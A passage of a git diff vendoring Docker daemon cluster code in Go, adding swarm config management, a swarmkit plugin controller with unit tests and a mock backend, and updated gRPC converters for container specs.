c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := getConfig(ctx, state.controlClient, input) + if err != nil { + return err + } + config = s + return nil + }); err != nil { + return types.Config{}, err + } + return convert.ConfigFromGRPC(config), nil +} + +// GetConfigs returns all configs of a managed swarm cluster. +func (c *Cluster) GetConfigs(options apitypes.ConfigListOptions) ([]types.Config, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + filters, err := newListConfigsFilters(options.Filters) + if err != nil { + return nil, err + } + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListConfigs(ctx, + &swarmapi.ListConfigsRequest{Filters: filters}) + if err != nil { + return nil, err + } + + configs := []types.Config{} + + for _, config := range r.Configs { + configs = append(configs, convert.ConfigFromGRPC(config)) + } + + return configs, nil +} + +// CreateConfig creates a new config in a managed swarm cluster. +func (c *Cluster) CreateConfig(s types.ConfigSpec) (string, error) { + var resp *swarmapi.CreateConfigResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + configSpec := convert.ConfigSpecToGRPC(s) + + r, err := state.controlClient.CreateConfig(ctx, + &swarmapi.CreateConfigRequest{Spec: &configSpec}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { + return "", err + } + return resp.Config.ID, nil +} + +// RemoveConfig removes a config from a managed swarm cluster. 
+func (c *Cluster) RemoveConfig(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + config, err := getConfig(ctx, state.controlClient, input) + if err != nil { + return err + } + + req := &swarmapi.RemoveConfigRequest{ + ConfigID: config.ID, + } + + _, err = state.controlClient.RemoveConfig(ctx, req) + return err + }) +} + +// UpdateConfig updates a config in a managed swarm cluster. +// Note: this is not exposed to the CLI but is available from the API only +func (c *Cluster) UpdateConfig(input string, version uint64, spec types.ConfigSpec) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + config, err := getConfig(ctx, state.controlClient, input) + if err != nil { + return err + } + + configSpec := convert.ConfigSpecToGRPC(spec) + + _, err = state.controlClient.UpdateConfig(ctx, + &swarmapi.UpdateConfigRequest{ + ConfigID: config.ID, + ConfigVersion: &swarmapi.Version{ + Index: version, + }, + Spec: &configSpec, + }) + return err + }) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go new file mode 100644 index 0000000000..6d7606aa84 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go @@ -0,0 +1,261 @@ +package plugin // import "github.com/docker/docker/daemon/cluster/controllers/plugin" + +import ( + "context" + "io" + "io/ioutil" + "net/http" + + "github.com/docker/distribution/reference" + enginetypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm/runtime" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/plugin" + "github.com/docker/docker/plugin/v2" + "github.com/docker/swarmkit/api" + "github.com/gogo/protobuf/proto" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// Controller is the controller for the plugin backend. 
+// Plugins are managed as a singleton object with a desired state (different from containers). +// With the plugin controller instead of having a strict create->start->stop->remove +// task lifecycle like containers, we manage the desired state of the plugin and let +// the plugin manager do what it already does and monitor the plugin. +// We'll also end up with many tasks all pointing to the same plugin ID. +// +// TODO(@cpuguy83): registry auth is intentionally not supported until we work out +// the right way to pass registry credentials via secrets. +type Controller struct { + backend Backend + spec runtime.PluginSpec + logger *logrus.Entry + + pluginID string + serviceID string + taskID string + + // hook used to signal tests that `Wait()` is actually ready and waiting + signalWaitReady func() +} + +// Backend is the interface for interacting with the plugin manager +// Controller actions are passed to the configured backend to do the real work. +type Backend interface { + Disable(name string, config *enginetypes.PluginDisableConfig) error + Enable(name string, config *enginetypes.PluginEnableConfig) error + Remove(name string, config *enginetypes.PluginRmConfig) error + Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error + Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error + Get(name string) (*v2.Plugin, error) + SubscribeEvents(buffer int, events ...plugin.Event) (eventCh <-chan interface{}, cancel func()) +} + +// NewController returns a new cluster plugin controller +func NewController(backend Backend, t *api.Task) (*Controller, error) { + spec, err := readSpec(t) + if err != nil { + return nil, err + } + return &Controller{ + backend: backend, + spec: 
spec, + serviceID: t.ServiceID, + logger: logrus.WithFields(logrus.Fields{ + "controller": "plugin", + "task": t.ID, + "plugin": spec.Name, + })}, nil +} + +func readSpec(t *api.Task) (runtime.PluginSpec, error) { + var cfg runtime.PluginSpec + + generic := t.Spec.GetGeneric() + if err := proto.Unmarshal(generic.Payload.Value, &cfg); err != nil { + return cfg, errors.Wrap(err, "error reading plugin spec") + } + return cfg, nil +} + +// Update is the update phase from swarmkit +func (p *Controller) Update(ctx context.Context, t *api.Task) error { + p.logger.Debug("Update") + return nil +} + +// Prepare is the prepare phase from swarmkit +func (p *Controller) Prepare(ctx context.Context) (err error) { + p.logger.Debug("Prepare") + + remote, err := reference.ParseNormalizedNamed(p.spec.Remote) + if err != nil { + return errors.Wrapf(err, "error parsing remote reference %q", p.spec.Remote) + } + + if p.spec.Name == "" { + p.spec.Name = remote.String() + } + + var authConfig enginetypes.AuthConfig + privs := convertPrivileges(p.spec.Privileges) + + pl, err := p.backend.Get(p.spec.Name) + + defer func() { + if pl != nil && err == nil { + pl.Acquire() + } + }() + + if err == nil && pl != nil { + if pl.SwarmServiceID != p.serviceID { + return errors.Errorf("plugin already exists: %s", p.spec.Name) + } + if pl.IsEnabled() { + if err := p.backend.Disable(pl.GetID(), &enginetypes.PluginDisableConfig{ForceDisable: true}); err != nil { + p.logger.WithError(err).Debug("could not disable plugin before running upgrade") + } + } + p.pluginID = pl.GetID() + return p.backend.Upgrade(ctx, remote, p.spec.Name, nil, &authConfig, privs, ioutil.Discard) + } + + if err := p.backend.Pull(ctx, remote, p.spec.Name, nil, &authConfig, privs, ioutil.Discard, plugin.WithSwarmService(p.serviceID)); err != nil { + return err + } + pl, err = p.backend.Get(p.spec.Name) + if err != nil { + return err + } + p.pluginID = pl.GetID() + + return nil +} + +// Start is the start phase from swarmkit +func (p 
*Controller) Start(ctx context.Context) error { + p.logger.Debug("Start") + + pl, err := p.backend.Get(p.pluginID) + if err != nil { + return err + } + + if p.spec.Disabled { + if pl.IsEnabled() { + return p.backend.Disable(p.pluginID, &enginetypes.PluginDisableConfig{ForceDisable: false}) + } + return nil + } + if !pl.IsEnabled() { + return p.backend.Enable(p.pluginID, &enginetypes.PluginEnableConfig{Timeout: 30}) + } + return nil +} + +// Wait causes the task to wait until returned +func (p *Controller) Wait(ctx context.Context) error { + p.logger.Debug("Wait") + + pl, err := p.backend.Get(p.pluginID) + if err != nil { + return err + } + + events, cancel := p.backend.SubscribeEvents(1, plugin.EventDisable{Plugin: pl.PluginObj}, plugin.EventRemove{Plugin: pl.PluginObj}, plugin.EventEnable{Plugin: pl.PluginObj}) + defer cancel() + + if p.signalWaitReady != nil { + p.signalWaitReady() + } + + if !p.spec.Disabled != pl.IsEnabled() { + return errors.New("mismatched plugin state") + } + + for { + select { + case <-ctx.Done(): + return ctx.Err() + case e := <-events: + p.logger.Debugf("got event %#T", e) + + switch e.(type) { + case plugin.EventEnable: + if p.spec.Disabled { + return errors.New("plugin enabled") + } + case plugin.EventRemove: + return errors.New("plugin removed") + case plugin.EventDisable: + if !p.spec.Disabled { + return errors.New("plugin disabled") + } + } + } + } +} + +func isNotFound(err error) bool { + return errdefs.IsNotFound(err) +} + +// Shutdown is the shutdown phase from swarmkit +func (p *Controller) Shutdown(ctx context.Context) error { + p.logger.Debug("Shutdown") + return nil +} + +// Terminate is the terminate phase from swarmkit +func (p *Controller) Terminate(ctx context.Context) error { + p.logger.Debug("Terminate") + return nil +} + +// Remove is the remove phase from swarmkit +func (p *Controller) Remove(ctx context.Context) error { + p.logger.Debug("Remove") + + pl, err := p.backend.Get(p.pluginID) + if err != nil { + if 
isNotFound(err) { + return nil + } + return err + } + + pl.Release() + if pl.GetRefCount() > 0 { + p.logger.Debug("skipping remove due to ref count") + return nil + } + + // This may error because we have exactly 1 plugin, but potentially multiple + // tasks which are calling remove. + err = p.backend.Remove(p.pluginID, &enginetypes.PluginRmConfig{ForceRemove: true}) + if isNotFound(err) { + return nil + } + return err +} + +// Close is the close phase from swarmkit +func (p *Controller) Close() error { + p.logger.Debug("Close") + return nil +} + +func convertPrivileges(ls []*runtime.PluginPrivilege) enginetypes.PluginPrivileges { + var out enginetypes.PluginPrivileges + for _, p := range ls { + pp := enginetypes.PluginPrivilege{ + Name: p.Name, + Description: p.Description, + Value: p.Value, + } + out = append(out, pp) + } + return out +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go new file mode 100644 index 0000000000..8329d44766 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go @@ -0,0 +1,390 @@ +package plugin // import "github.com/docker/docker/daemon/cluster/controllers/plugin" + +import ( + "context" + "errors" + "io" + "io/ioutil" + "net/http" + "strings" + "testing" + "time" + + "github.com/docker/distribution/reference" + enginetypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm/runtime" + "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/plugin" + "github.com/docker/docker/plugin/v2" + "github.com/sirupsen/logrus" +) + +const ( + pluginTestName = "test" + pluginTestRemote = "testremote" + pluginTestRemoteUpgrade = "testremote2" +) + +func TestPrepare(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + 
} + + if b.p == nil { + t.Fatal("pull not performed") + } + + c = newTestController(b, false) + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if b.p == nil { + t.Fatal("unexpected nil") + } + if b.p.PluginObj.PluginReference != pluginTestRemoteUpgrade { + t.Fatal("upgrade not performed") + } + + c = newTestController(b, false) + c.serviceID = "1" + if err := c.Prepare(ctx); err == nil { + t.Fatal("expected error on prepare") + } +} + +func TestStart(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + if !b.p.IsEnabled() { + t.Fatal("expected plugin to be enabled") + } + + c = newTestController(b, true) + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + if b.p.IsEnabled() { + t.Fatal("expected plugin to be disabled") + } + + c = newTestController(b, false) + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + if !b.p.IsEnabled() { + t.Fatal("expected plugin to be enabled") + } +} + +func TestWaitCancel(t *testing.T) { + b := newMockBackend() + c := newTestController(b, true) + ctx := context.Background() + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + ctxCancel, cancel := context.WithCancel(ctx) + chErr := make(chan error) + go func() { + chErr <- c.Wait(ctxCancel) + }() + cancel() + select { + case err := <-chErr: + if err != context.Canceled { + t.Fatal(err) + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for cancelation") + } +} + +func TestWaitDisabled(t *testing.T) { + b := newMockBackend() + c := newTestController(b, true) + ctx := context.Background() + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != 
nil { + t.Fatal(err) + } + + chErr := make(chan error) + go func() { + chErr <- c.Wait(ctx) + }() + + if err := b.Enable("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + ctxWaitReady, cancelCtxWaitReady := context.WithTimeout(ctx, 30*time.Second) + c.signalWaitReady = cancelCtxWaitReady + defer cancelCtxWaitReady() + + go func() { + chErr <- c.Wait(ctx) + }() + + chEvent, cancel := b.SubscribeEvents(1) + defer cancel() + + if err := b.Disable("test", nil); err != nil { + t.Fatal(err) + } + + select { + case <-chEvent: + <-ctxWaitReady.Done() + if err := ctxWaitReady.Err(); err == context.DeadlineExceeded { + t.Fatal(err) + } + select { + case <-chErr: + t.Fatal("wait returned unexpectedly") + default: + // all good + } + case <-chErr: + t.Fatal("wait returned unexpectedly") + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := b.Remove("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + if !strings.Contains(err.Error(), "removed") { + t.Fatal(err) + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } +} + +func TestWaitEnabled(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Start(ctx); err != nil { + t.Fatal(err) + } + + chErr := make(chan error) + go func() { + chErr <- c.Wait(ctx) + }() + + if err := b.Disable("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := c.Start(ctx); err != nil { + 
t.Fatal(err) + } + + ctxWaitReady, ctxWaitCancel := context.WithCancel(ctx) + c.signalWaitReady = ctxWaitCancel + defer ctxWaitCancel() + + go func() { + chErr <- c.Wait(ctx) + }() + + chEvent, cancel := b.SubscribeEvents(1) + defer cancel() + + if err := b.Enable("test", nil); err != nil { + t.Fatal(err) + } + + select { + case <-chEvent: + <-ctxWaitReady.Done() + if err := ctxWaitReady.Err(); err == context.DeadlineExceeded { + t.Fatal(err) + } + select { + case <-chErr: + t.Fatal("wait returned unexpectedly") + default: + // all good + } + case <-chErr: + t.Fatal("wait returned unexpectedly") + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } + + if err := b.Remove("test", nil); err != nil { + t.Fatal(err) + } + select { + case err := <-chErr: + if err == nil { + t.Fatal("expected error") + } + if !strings.Contains(err.Error(), "removed") { + t.Fatal(err) + } + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for event") + } +} + +func TestRemove(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if err := c.Shutdown(ctx); err != nil { + t.Fatal(err) + } + + c2 := newTestController(b, false) + if err := c2.Prepare(ctx); err != nil { + t.Fatal(err) + } + + if err := c.Remove(ctx); err != nil { + t.Fatal(err) + } + if b.p == nil { + t.Fatal("plugin removed unexpectedly") + } + if err := c2.Shutdown(ctx); err != nil { + t.Fatal(err) + } + if err := c2.Remove(ctx); err != nil { + t.Fatal(err) + } + if b.p != nil { + t.Fatal("expected plugin to be removed") + } +} + +func newTestController(b Backend, disabled bool) *Controller { + return &Controller{ + logger: &logrus.Entry{Logger: &logrus.Logger{Out: ioutil.Discard}}, + backend: b, + spec: runtime.PluginSpec{ + Name: pluginTestName, + Remote: pluginTestRemote, + Disabled: disabled, + }, + } +} + +func newMockBackend() *mockBackend { + return &mockBackend{ 
+ pub: pubsub.NewPublisher(0, 0), + } +} + +type mockBackend struct { + p *v2.Plugin + pub *pubsub.Publisher +} + +func (m *mockBackend) Disable(name string, config *enginetypes.PluginDisableConfig) error { + m.p.PluginObj.Enabled = false + m.pub.Publish(plugin.EventDisable{}) + return nil +} + +func (m *mockBackend) Enable(name string, config *enginetypes.PluginEnableConfig) error { + m.p.PluginObj.Enabled = true + m.pub.Publish(plugin.EventEnable{}) + return nil +} + +func (m *mockBackend) Remove(name string, config *enginetypes.PluginRmConfig) error { + m.p = nil + m.pub.Publish(plugin.EventRemove{}) + return nil +} + +func (m *mockBackend) Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error { + m.p = &v2.Plugin{ + PluginObj: enginetypes.Plugin{ + ID: "1234", + Name: name, + PluginReference: ref.String(), + }, + } + return nil +} + +func (m *mockBackend) Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error { + m.p.PluginObj.PluginReference = pluginTestRemoteUpgrade + return nil +} + +func (m *mockBackend) Get(name string) (*v2.Plugin, error) { + if m.p == nil { + return nil, errors.New("not found") + } + return m.p, nil +} + +func (m *mockBackend) SubscribeEvents(buffer int, events ...plugin.Event) (eventCh <-chan interface{}, cancel func()) { + ch := m.pub.SubscribeTopicWithBuffer(nil, buffer) + cancel = func() { m.pub.Evict(ch) } + return ch, cancel +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/config.go b/vendor/github.com/docker/docker/daemon/cluster/convert/config.go new file mode 100644 index 0000000000..16b3475af8 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/config.go @@ -0,0 +1,78 @@ +package convert // 
import "github.com/docker/docker/daemon/cluster/convert" + +import ( + swarmtypes "github.com/docker/docker/api/types/swarm" + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + gogotypes "github.com/gogo/protobuf/types" +) + +// ConfigFromGRPC converts a grpc Config to a Config. +func ConfigFromGRPC(s *swarmapi.Config) swarmtypes.Config { + config := swarmtypes.Config{ + ID: s.ID, + Spec: swarmtypes.ConfigSpec{ + Annotations: annotationsFromGRPC(s.Spec.Annotations), + Data: s.Spec.Data, + }, + } + + config.Version.Index = s.Meta.Version.Index + // Meta + config.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt) + config.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt) + + if s.Spec.Templating != nil { + config.Spec.Templating = &types.Driver{ + Name: s.Spec.Templating.Name, + Options: s.Spec.Templating.Options, + } + } + + return config +} + +// ConfigSpecToGRPC converts Config to a grpc Config. +func ConfigSpecToGRPC(s swarmtypes.ConfigSpec) swarmapi.ConfigSpec { + spec := swarmapi.ConfigSpec{ + Annotations: swarmapi.Annotations{ + Name: s.Name, + Labels: s.Labels, + }, + Data: s.Data, + } + + if s.Templating != nil { + spec.Templating = &swarmapi.Driver{ + Name: s.Templating.Name, + Options: s.Templating.Options, + } + } + + return spec +} + +// ConfigReferencesFromGRPC converts a slice of grpc ConfigReference to ConfigReference +func ConfigReferencesFromGRPC(s []*swarmapi.ConfigReference) []*swarmtypes.ConfigReference { + refs := []*swarmtypes.ConfigReference{} + + for _, r := range s { + ref := &swarmtypes.ConfigReference{ + ConfigID: r.ConfigID, + ConfigName: r.ConfigName, + } + + if t, ok := r.Target.(*swarmapi.ConfigReference_File); ok { + ref.File = &swarmtypes.ConfigReferenceFileTarget{ + Name: t.File.Name, + UID: t.File.UID, + GID: t.File.GID, + Mode: t.File.Mode, + } + } + + refs = append(refs, ref) + } + + return refs +} diff --git 
a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go index 10383f749b..d889b4004c 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go @@ -1,32 +1,41 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( + "errors" "fmt" "strings" - "github.com/Sirupsen/logrus" - container "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/container" mounttypes "github.com/docker/docker/api/types/mount" types "github.com/docker/docker/api/types/swarm" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + gogotypes "github.com/gogo/protobuf/types" + "github.com/sirupsen/logrus" ) -func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { - containerSpec := types.ContainerSpec{ - Image: c.Image, - Labels: c.Labels, - Command: c.Command, - Args: c.Args, - Hostname: c.Hostname, - Env: c.Env, - Dir: c.Dir, - User: c.User, - Groups: c.Groups, - TTY: c.TTY, - OpenStdin: c.OpenStdin, - Hosts: c.Hosts, - Secrets: secretReferencesFromGRPC(c.Secrets), +func containerSpecFromGRPC(c *swarmapi.ContainerSpec) *types.ContainerSpec { + if c == nil { + return nil + } + containerSpec := &types.ContainerSpec{ + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + StopSignal: c.StopSignal, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + ReadOnly: c.ReadOnly, + Hosts: c.Hosts, + Secrets: secretReferencesFromGRPC(c.Secrets), + Configs: configReferencesFromGRPC(c.Configs), + Isolation: IsolationFromGRPC(c.Isolation), + Init: initFromGRPC(c.Init), } if c.DNSConfig != nil { @@ -37,6 +46,31 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { } } + // 
Privileges + if c.Privileges != nil { + containerSpec.Privileges = &types.Privileges{} + + if c.Privileges.CredentialSpec != nil { + containerSpec.Privileges.CredentialSpec = &types.CredentialSpec{} + switch c.Privileges.CredentialSpec.Source.(type) { + case *swarmapi.Privileges_CredentialSpec_File: + containerSpec.Privileges.CredentialSpec.File = c.Privileges.CredentialSpec.GetFile() + case *swarmapi.Privileges_CredentialSpec_Registry: + containerSpec.Privileges.CredentialSpec.Registry = c.Privileges.CredentialSpec.GetRegistry() + } + } + + if c.Privileges.SELinuxContext != nil { + containerSpec.Privileges.SELinuxContext = &types.SELinuxContext{ + Disable: c.Privileges.SELinuxContext.Disable, + User: c.Privileges.SELinuxContext.User, + Type: c.Privileges.SELinuxContext.Type, + Role: c.Privileges.SELinuxContext.Role, + Level: c.Privileges.SELinuxContext.Level, + } + } + } + // Mounts for _, m := range c.Mounts { mount := mounttypes.Mount{ @@ -75,7 +109,7 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { } if c.StopGracePeriod != nil { - grace, _ := ptypes.Duration(c.StopGracePeriod) + grace, _ := gogotypes.DurationFromProto(c.StopGracePeriod) containerSpec.StopGracePeriod = &grace } @@ -86,6 +120,21 @@ func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { return containerSpec } +func initFromGRPC(v *gogotypes.BoolValue) *bool { + if v == nil { + return nil + } + value := v.GetValue() + return &value +} + +func initToGRPC(v *bool) *gogotypes.BoolValue { + if v == nil { + return nil + } + return &gogotypes.BoolValue{Value: *v} +} + func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretReference { refs := make([]*swarmapi.SecretReference, 0, len(sr)) for _, s := range sr { @@ -95,7 +144,7 @@ func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretRefer } if s.File != nil { ref.Target = &swarmapi.SecretReference_File{ - File: &swarmapi.SecretReference_FileTarget{ + File: 
&swarmapi.FileTarget{ Name: s.File.Name, UID: s.File.UID, GID: s.File.GID, @@ -109,6 +158,7 @@ func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretRefer return refs } + func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretReference { refs := make([]*types.SecretReference, 0, len(sr)) for _, s := range sr { @@ -133,21 +183,74 @@ func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretRef return refs } -func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { +func configReferencesToGRPC(sr []*types.ConfigReference) []*swarmapi.ConfigReference { + refs := make([]*swarmapi.ConfigReference, 0, len(sr)) + for _, s := range sr { + ref := &swarmapi.ConfigReference{ + ConfigID: s.ConfigID, + ConfigName: s.ConfigName, + } + if s.File != nil { + ref.Target = &swarmapi.ConfigReference_File{ + File: &swarmapi.FileTarget{ + Name: s.File.Name, + UID: s.File.UID, + GID: s.File.GID, + Mode: s.File.Mode, + }, + } + } + + refs = append(refs, ref) + } + + return refs +} + +func configReferencesFromGRPC(sr []*swarmapi.ConfigReference) []*types.ConfigReference { + refs := make([]*types.ConfigReference, 0, len(sr)) + for _, s := range sr { + target := s.GetFile() + if target == nil { + // not a file target + logrus.Warnf("config target not a file: config=%s", s.ConfigID) + continue + } + refs = append(refs, &types.ConfigReference{ + File: &types.ConfigReferenceFileTarget{ + Name: target.Name, + UID: target.UID, + GID: target.GID, + Mode: target.Mode, + }, + ConfigID: s.ConfigID, + ConfigName: s.ConfigName, + }) + } + + return refs +} + +func containerToGRPC(c *types.ContainerSpec) (*swarmapi.ContainerSpec, error) { containerSpec := &swarmapi.ContainerSpec{ - Image: c.Image, - Labels: c.Labels, - Command: c.Command, - Args: c.Args, - Hostname: c.Hostname, - Env: c.Env, - Dir: c.Dir, - User: c.User, - Groups: c.Groups, - TTY: c.TTY, - OpenStdin: c.OpenStdin, - Hosts: c.Hosts, - Secrets: 
secretReferencesToGRPC(c.Secrets), + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + StopSignal: c.StopSignal, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + ReadOnly: c.ReadOnly, + Hosts: c.Hosts, + Secrets: secretReferencesToGRPC(c.Secrets), + Configs: configReferencesToGRPC(c.Configs), + Isolation: isolationToGRPC(c.Isolation), + Init: initToGRPC(c.Init), } if c.DNSConfig != nil { @@ -159,7 +262,41 @@ func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { } if c.StopGracePeriod != nil { - containerSpec.StopGracePeriod = ptypes.DurationProto(*c.StopGracePeriod) + containerSpec.StopGracePeriod = gogotypes.DurationProto(*c.StopGracePeriod) + } + + // Privileges + if c.Privileges != nil { + containerSpec.Privileges = &swarmapi.Privileges{} + + if c.Privileges.CredentialSpec != nil { + containerSpec.Privileges.CredentialSpec = &swarmapi.Privileges_CredentialSpec{} + + if c.Privileges.CredentialSpec.File != "" && c.Privileges.CredentialSpec.Registry != "" { + return nil, errors.New("cannot specify both \"file\" and \"registry\" credential specs") + } + if c.Privileges.CredentialSpec.File != "" { + containerSpec.Privileges.CredentialSpec.Source = &swarmapi.Privileges_CredentialSpec_File{ + File: c.Privileges.CredentialSpec.File, + } + } else if c.Privileges.CredentialSpec.Registry != "" { + containerSpec.Privileges.CredentialSpec.Source = &swarmapi.Privileges_CredentialSpec_Registry{ + Registry: c.Privileges.CredentialSpec.Registry, + } + } else { + return nil, errors.New("must either provide \"file\" or \"registry\" for credential spec") + } + } + + if c.Privileges.SELinuxContext != nil { + containerSpec.Privileges.SELinuxContext = &swarmapi.Privileges_SELinuxContext{ + Disable: c.Privileges.SELinuxContext.Disable, + User: c.Privileges.SELinuxContext.User, + Type: c.Privileges.SELinuxContext.Type, + Role: 
c.Privileges.SELinuxContext.Role, + Level: c.Privileges.SELinuxContext.Level, + } + } } // Mounts @@ -215,21 +352,47 @@ func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { } func healthConfigFromGRPC(h *swarmapi.HealthConfig) *container.HealthConfig { - interval, _ := ptypes.Duration(h.Interval) - timeout, _ := ptypes.Duration(h.Timeout) + interval, _ := gogotypes.DurationFromProto(h.Interval) + timeout, _ := gogotypes.DurationFromProto(h.Timeout) + startPeriod, _ := gogotypes.DurationFromProto(h.StartPeriod) return &container.HealthConfig{ - Test: h.Test, - Interval: interval, - Timeout: timeout, - Retries: int(h.Retries), + Test: h.Test, + Interval: interval, + Timeout: timeout, + Retries: int(h.Retries), + StartPeriod: startPeriod, } } func healthConfigToGRPC(h *container.HealthConfig) *swarmapi.HealthConfig { return &swarmapi.HealthConfig{ - Test: h.Test, - Interval: ptypes.DurationProto(h.Interval), - Timeout: ptypes.DurationProto(h.Timeout), - Retries: int32(h.Retries), + Test: h.Test, + Interval: gogotypes.DurationProto(h.Interval), + Timeout: gogotypes.DurationProto(h.Timeout), + Retries: int32(h.Retries), + StartPeriod: gogotypes.DurationProto(h.StartPeriod), + } +} + +// IsolationFromGRPC converts a swarm api container isolation to a moby isolation representation +func IsolationFromGRPC(i swarmapi.ContainerSpec_Isolation) container.Isolation { + switch i { + case swarmapi.ContainerIsolationHyperV: + return container.IsolationHyperV + case swarmapi.ContainerIsolationProcess: + return container.IsolationProcess + case swarmapi.ContainerIsolationDefault: + return container.IsolationDefault + } + return container.IsolationEmpty +} + +func isolationToGRPC(i container.Isolation) swarmapi.ContainerSpec_Isolation { + if i.IsHyperV() { + return swarmapi.ContainerIsolationHyperV + } + if i.IsProcess() { + return swarmapi.ContainerIsolationProcess } + return swarmapi.ContainerIsolationDefault } diff --git 
